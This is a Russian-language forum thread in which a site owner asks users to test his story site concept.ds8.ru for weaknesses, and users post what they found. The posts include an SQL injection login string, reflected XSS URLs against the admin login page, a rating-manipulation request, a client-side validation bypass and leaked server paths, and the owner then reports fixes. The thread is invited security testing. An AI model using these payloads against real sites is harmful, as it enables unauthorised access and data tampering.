![]() |
Проверте на надёжность
|
При регистрации.
Логин ' раs ' Вёдоёт Warning: DOMDocument::loadXML() [domdocument.loadxml]: attributes construct error in Entity, line: 63 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76 Warning: DOMDocument::loadXML() [domdocument.loadxml]: Couldn't find end of Start Tag login line 63 in Entity, line: 63 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76 |
Цитата:
|
Та же фигня, регался с ником "><hr>
Цитата:
|
Обращение к бд только при регистрации, что-ли?
|
sql inject в логине:
логин: ' or '1'=1' пасс: любой Здрасте, админ) add: админка http://concept.ds8.ru/admin |
XSS
http://concept.ds8.ru/admin/login.php?page="><script>alert()</script>&ide= http://concept.ds8.ru/admin/login.php?page=&ide="><script>alert()</script> |
от имени админа у меня добавляются только пустые комменты
|
http://concept.ds8.ru/erotic
http://concept.ds8.ru/avto И прочеее Цитата:
|
http://concept.ds8.ru/addvoce.php?story={id рассказа}&b=999999
Итого: рейтинг у рассказа - 999999 :D |
В добавлении нового рассказа фильтрация только на стороне клиента, мона заслать оч длинный текст ..
было <textarea class="add border" id="addvariant" onchange="validate('addvariant')" onkeyup="validate('addvariant')"></textarea> стало <textarea class="add border" id="addvariant"></textarea> |
Цитата:
и облом твоим стараниям)) |
вроде всё поправил) спасибо за глюки, недосмотрел, если не лень проверте ещё разок)
|
http://concept.ds8.ru/erotic/comments_"><>
Цитата:
|
Цитата:
|
Регаем армию писателей)
Код:
POST http://concept.ds8.ru/registration HTTP/1.0 |
Я чего-то натворил..
Регнулся под '+or+1=1/* и под '"/><script>alert(/1/)</script> и на главной теперь неверно ведуться ссылки на последние каменты, рассказы и прочее :) |
| Время: 04:54 |